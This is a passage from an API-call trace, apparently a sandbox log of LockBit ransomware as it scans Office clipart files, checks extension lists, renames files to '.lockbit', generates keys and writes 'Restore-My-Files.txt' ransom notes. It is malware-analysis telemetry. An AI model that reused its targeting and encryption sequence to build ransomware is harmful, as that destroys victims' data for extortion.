(lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.165] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.165] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.165] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.165] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.165] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.165] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.165] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.165] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.165] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.165] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.165] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.165] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.165] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.165] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.165] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.165] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.165] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.165] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.165] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.166] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.166] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.166] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.166] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.166] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.166] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.166] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152884.WMF") returned 1 [0146.166] lstrcmpiW (lpString1="ntldr", lpString2="J0152884.WMF") returned 1 [0146.166] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152884.WMF") returned 1 [0146.166] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152884.WMF") returned -1 [0146.166] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152884.WMF") returned -1 [0146.166] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152884.WMF") returned 1 [0146.166] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152884.WMF") returned -1 [0146.166] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.166] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF") returned=".WMF" [0146.166] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.166] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.166] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.166] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.167] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.167] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.167] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.167] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.167] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.167] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.167] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.167] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.167] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.167] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.167] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.167] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.167] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.167] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.167] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.167] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.167] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.167] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.167] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.167] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.168] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.168] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.168] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.168] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.168] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF.lockbit") returned 72 [0146.168] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152884.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0146.169] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.169] malloc (_Size=0x40068) returned 0x3df0008 [0146.169] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6956) returned 1 [0146.169] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.170] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0146.170] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.171] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0146.171] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0146.177] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.177] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.177] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.178] free (_Block=0x1fa2ed8) [0146.178] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.178] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.178] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.179] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f73730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x794, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152890.WMF", cAlternateFileName="")) returned 1 [0146.179] lstrcmpiW (lpString1=".", lpString2="J0152890.WMF") returned -1 [0146.179] lstrcmpiW (lpString1="..", lpString2="J0152890.WMF") returned -1 [0146.179] PathFindExtensionW (pszPath="J0152890.WMF") returned=".WMF" [0146.179] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.179] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.179] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.179] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.179] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.179] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.179] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.179] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.179] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.179] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.179] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.179] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.179] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.180] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.180] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.180] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.180] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.180] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.180] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.180] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.180] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.180] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.180] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.180] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.180] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.180] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.180] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.180] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.180] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.180] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.180] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.181] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.181] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.181] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.181] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.181] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.181] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.181] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.181] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.181] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.181] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.181] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.181] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.181] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.181] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.181] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.181] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.181] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152890.WMF") returned 1 [0146.182] lstrcmpiW (lpString1="ntldr", lpString2="J0152890.WMF") returned 1 [0146.182] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152890.WMF") returned 1 [0146.182] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152890.WMF") returned -1 [0146.182] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152890.WMF") returned -1 [0146.182] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152890.WMF") returned 1 [0146.182] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152890.WMF") returned -1 [0146.182] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.182] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF") returned=".WMF" [0146.182] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.182] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.182] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.182] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.182] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.182] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.182] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.182] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.182] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.182] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.182] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.183] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.183] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.183] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.183] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.183] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.183] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.183] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.183] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.183] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.183] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.183] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.183] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.183] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.183] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.183] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.183] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.183] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.183] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF.lockbit") returned 72 [0146.183] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152890.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0146.189] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.189] malloc (_Size=0x40068) returned 0x1ff1e60 [0146.189] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1940) returned 1 [0146.189] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.190] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0146.190] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.190] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0146.190] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0146.193] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.193] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.193] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.195] free (_Block=0x1fa2ed8) [0146.195] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.195] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.195] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.195] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56452630, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x29ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152892.WMF", cAlternateFileName="")) returned 1 [0146.195] lstrcmpiW (lpString1=".", lpString2="J0152892.WMF") returned -1 [0146.195] lstrcmpiW (lpString1="..", lpString2="J0152892.WMF") returned -1 [0146.195] PathFindExtensionW (pszPath="J0152892.WMF") returned=".WMF" [0146.195] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.195] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.195] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.195] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.195] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.195] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.195] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.196] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.196] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.197] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.197] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.197] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.197] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.197] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.197] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.197] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.197] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.197] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.197] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.197] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.197] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.197] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.197] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.197] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152892.WMF") returned 1 [0146.197] lstrcmpiW (lpString1="ntldr", lpString2="J0152892.WMF") returned 1 [0146.197] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152892.WMF") returned 1 [0146.197] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152892.WMF") returned -1 [0146.197] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152892.WMF") returned -1 [0146.197] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152892.WMF") returned 1 [0146.197] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152892.WMF") returned -1 [0146.197] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.197] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned=".WMF" [0146.197] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.197] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.197] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.197] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.197] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.197] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.198] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.198] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF.lockbit") returned 72 [0146.198] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152892.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0146.199] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.199] malloc (_Size=0x40068) returned 0x3ef0008 [0146.199] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=10668) returned 1 [0146.199] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.200] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0146.200] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.200] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0146.200] ReadFile (in: hFile=0xec, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, 